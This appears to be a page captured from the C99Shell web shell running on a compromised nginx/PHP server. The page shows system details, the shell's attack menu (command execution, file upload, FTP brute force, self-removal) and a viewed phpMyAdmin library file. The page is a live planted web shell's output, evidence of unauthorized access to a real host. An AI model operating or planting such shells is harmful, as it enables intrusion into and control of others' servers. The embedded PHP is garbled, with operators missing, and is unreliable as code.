!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpMY/libraries/   drwxrwxr-x
Free 83.34 GB of 96.73 GB (86.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     display_create_database.lib.php (1.78 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Displays form for creating database (if user has privileges for that)
 *
 * @package PhpMyAdmin
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

/**
 *
 */
require_once './libraries/check_user_privileges.lib.php';

if (
$is_create_db_priv) {
    
// The user is allowed to create a db
    
?>
        <form method="post" action="db_create.php" id="create_database_form" <?php echo ($GLOBALS['cfg']['AjaxEnable'] ? 'class="ajax" ' ''); ?>><strong>
            <?php echo '<label for="text_create_db">' __('Create database') . '</label>&nbsp;' PMA_showMySQLDocu('SQL-Syntax''CREATE_DATABASE'); ?></strong><br />
            <?php echo PMA_generate_common_hidden_inputs(''''5); ?>
            <input type="hidden" name="reload" value="1" />
            <input type="text" name="new_db" value="<?php echo $db_to_create?>" maxlength="64" class="textfield" id="text_create_db"/>
    <?php
    
include_once './libraries/mysql_charsets.lib.php';
    echo 
PMA_generateCharsetDropdownBox(PMA_CSDROPDOWN_COLLATION'db_collation'nullnulltrue5);

    if (! empty(
$dbstats)) {
        echo 
'<input type="hidden" name="dbstats" value="1" />';
    }
    
?>
            <input type="submit" value="<?php echo __('Create'); ?>" id="buttonGo" />
        </form>
    <?php
} else {
    
?>
    <!-- db creation no privileges message -->
        <strong><?php echo __('Create database') . ':&nbsp;' PMA_showMySQLDocu('SQL-Syntax''CREATE_DATABASE'); ?></strong><br />
        <?php
              
echo '<span class="noPrivileges">'
                 
. ($cfg['ErrorIconic'] ? PMA_getImage('s_error2.png''', array('hspace' => 2'border' => 0'align' => 'middle')) : '')
                 . 
'' __('No Privileges') .'</span>';
// end create db form or message
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0042 ]--